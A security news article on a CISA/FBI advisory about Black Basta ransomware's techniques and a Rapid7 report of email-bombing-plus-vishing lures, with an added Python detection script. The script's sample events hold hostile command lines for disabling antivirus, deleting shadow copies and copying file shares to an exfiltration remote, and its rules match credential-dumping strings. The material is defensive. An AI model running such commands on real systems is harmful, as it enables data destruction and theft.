Black Basta target orgs with new social engineering campaign

Black Basta, one of the most prolific ransomware-as-a-service operators, is trying out a combination of email bombing (flooding inboxes with junk mail) and vishing (voice phishing) to get employees to download remote access tools.

Black Basta TTPs and newest initial access attempts

According to a cybersecurity advisory published on Friday by CISA, the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), Black Basta has used, or continues to use:

  • Qakbot, spearphishing, exploitation of known vulnerabilities, and valid credentials for initial access
  • The SoftPerfect network scanner for network scanning
  • BITSAdmin, PsExec, RDP, Splashtop, ScreenConnect and Cobalt Strike beacons for lateral movement, and Mimikatz for privilege escalation
  • Exploits for vulnerabilities such as ZeroLogon (CVE-2020-1472), NoPac (CVE-2021-42278 and CVE-2021-42287), and PrintNightmare (CVE-2021-34527) for local and Windows Active Directory domain privilege escalation
  • RClone and WinSCP for data exfiltration, PowerShell to disable antivirus products, and Backstab to disable endpoint detection and response (EDR) tools
  • The vssadmin utility to delete volume shadow copies before encrypting files, so that victims cannot restore from local snapshots

The advisory lists indicators of compromise associated with Black Basta ransomware attacks and offers advice for organizations.

Rapid7 analysts have also shared the latest social engineering trick by the Black Basta operators: they spam targets’ inboxes with junk email, then phone them posing as a member of their organization’s IT team and offer assistance. They ask the target to install a legitimate remote monitoring and management (RMM) tool (e.g., AnyDesk) or to start Quick Assist, the built-in Windows remote support utility.

If their social engineering efforts are unsuccessful with one target, they move on to the next.

“Once the threat actor successfully gains access to a user’s computer, they begin executing a series of batch scripts, presented to the user as updates, likely in an attempt to appear more legitimate and evade suspicion,” the analysts noted.

The scripts establish persistence, open a reverse shell connection to a specified C2 server, and harvest the victim’s credentials from the command line using PowerShell.

“In most of the observed batch script variations, the credentials are immediately exfiltrated to the threat actor’s server via a Secure Copy command (SCP). In at least one other observed script variant, credentials are saved to an archive and must be manually retrieved,” they also added.

“In one observed case, once the initial compromise was completed, the threat actor then attempted to move laterally throughout the environment via SMB using Impacket, and ultimately failed to deploy Cobalt Strike despite several attempts. While Rapid7 did not observe successful data exfiltration or ransomware deployment in any of our investigations, the indicators of compromise found via forensic analysis conducted by Rapid7 are consistent with the Black Basta ransomware group based on internal and open source intelligence.”

Rapid7 advised organizations to block all unapproved RMM solutions from executing within the environment, and to establish channels and methods employees can use to contact their IT department and report suspicious emails and phone calls.
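To make the advisory's TTP list and Rapid7's RMM advice concrete, here is an added example (not code from the advisory, from Rapid7, or from the page) that runs simple detection rules over constructed process-creation events in a Sysmon Event ID 1 / Security 4688 style and then correlates an unapproved RMM launch with any other flagged TTP on the same host. The sample events, host names, users and file paths are made up for this example; the executable names used for Splashtop (SRServer.exe) and ScreenConnect, and the choice of Splashtop as the only sanctioned RMM, are assumptions rather than facts from the article.

```python
import re

# Constructed sample process-creation events written for this example;
# hosts, users and paths are illustrative, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS-0142", "user": "CORP\\jdoe", "parent": "explorer.exe",
     "image": "C:\\Users\\jdoe\\Downloads\\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"host": "WS-0142", "user": "CORP\\jdoe", "parent": "explorer.exe",
     "image": "C:\\Program Files\\WindowsApps\\QuickAssist\\QuickAssist.exe",
     "cmdline": "QuickAssist.exe"},
    {"host": "WS-0142", "user": "CORP\\jdoe", "parent": "explorer.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c C:\\Users\\jdoe\\AppData\\Local\\Temp\\update1.bat"},
    {"host": "WS-0142", "user": "CORP\\jdoe", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -Command "
                "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "SRV-FS01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "SRV-FS01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "image": "C:\\Temp\\rclone.exe",
     "cmdline": "rclone.exe copy D:\\Shares remote:exfil --transfers 16"},
    # Benign look-alikes: listing shadows is routine, and Splashtop is the
    # sanctioned RMM in this example environment (assumption).
    {"host": "WS-0142", "user": "CORP\\jdoe", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},
    {"host": "WS-0077", "user": "CORP\\itadmin", "parent": "services.exe",
     "image": "C:\\Program Files\\Splashtop\\Splashtop Remote\\Server\\SRServer.exe",
     "cmdline": "SRServer.exe"},
]

# Executable names of the remote-access tools named in the article. The
# Splashtop and ScreenConnect names are assumptions for this example.
RMM_TOOLS = {"anydesk.exe", "quickassist.exe", "srserver.exe",
             "screenconnect.clientservice.exe"}
APPROVED_RMM = {"srserver.exe"}  # assumption: only Splashtop is sanctioned here


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def cmd(event):
    return event.get("cmdline", "").lower()


# Each rule maps one TTP from the advisory or the Rapid7 write-up to a
# predicate over a single process-creation event.
RULES = [
    ("unapproved_rmm", lambda e: basename(e["image"]) in RMM_TOOLS
     and basename(e["image"]) not in APPROVED_RMM),
    ("batch_from_user_temp", lambda e: basename(e["image"]) == "cmd.exe"
     and re.search(r"\\appdata\\local\\temp\\[^\s]+\.bat\b", cmd(e)) is not None),
    ("av_tamper_powershell", lambda e: basename(e["image"]) == "powershell.exe"
     and re.search(r"set-mppreference\s+-disable", cmd(e)) is not None),
    ("shadow_copy_deletion", lambda e: basename(e["image"]) == "vssadmin.exe"
     and re.search(r"\bdelete\s+shadows\b", cmd(e)) is not None),
    ("exfil_tooling", lambda e: basename(e["image"]) in {"rclone.exe", "winscp.exe"}),
    ("bits_transfer", lambda e: basename(e["image"]) == "bitsadmin.exe"
     and "/transfer" in cmd(e)),
    ("remote_exec_tool", lambda e: basename(e["image"]) in {"psexec.exe", "psexesvc.exe"}),
    ("credential_dumping", lambda e: "mimikatz" in cmd(e) or "sekurlsa::" in cmd(e)),
]


def scan(events):
    """Return one finding per (event, matched rule), in event order."""
    findings = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                findings.append({"host": e["host"], "user": e["user"],
                                 "rule": name, "cmdline": e["cmdline"]})
    return findings


def escalate(findings):
    """Hosts where an unapproved RMM launch coincides with at least one other
    flagged TTP: the chain Rapid7 describes (RMM, then scripts, then tampering)."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["rule"])
    return sorted(h for h, rules in by_host.items()
                  if "unapproved_rmm" in rules and len(rules) > 1)


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']:9} {f['user']:18} {f['rule']:22} {f['cmdline']}")
    print("escalate:", escalate(scan(SAMPLE_EVENTS)))
```

On the sample data the single AnyDesk or Quick Assist launch on WS-0142 is only a low-severity finding on its own, since users do start remote-support tools legitimately; what makes WS-0142 worth an immediate response is that the same host then runs a batch file from the user's Temp folder and a PowerShell command that turns off real-time protection, which is why `escalate` keys on that combination rather than on any one rule. Production rules would also want the approved-RMM list tied to an executable hash or signer rather than a file name.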

Who is Black Basta?

The Russian-speaking Black Basta group is believed to have been started by former members of the infamous Conti ransomware collective, which dissolved in May 2022.

Since then, Black Basta and its affiliates have hit over 500 organizations around the world, predominantly in North America, Europe, and Australia. They target businesses and organizations in critical infrastructure sectors (including healthcare).

In late 2023, Elliptic and Corvus Insurance pinpointed “at least $107 million in Bitcoin ransom payments to the Black Basta ransomware group since early 2022,” and said that blockchain transactions form a clear link between Black Basta and Conti.

Unlike some ransomware groups, Black Basta does not outright define the ransom amount to be paid. Instead, they tell the victim to contact them via a specified .onion URL to negotiate it.
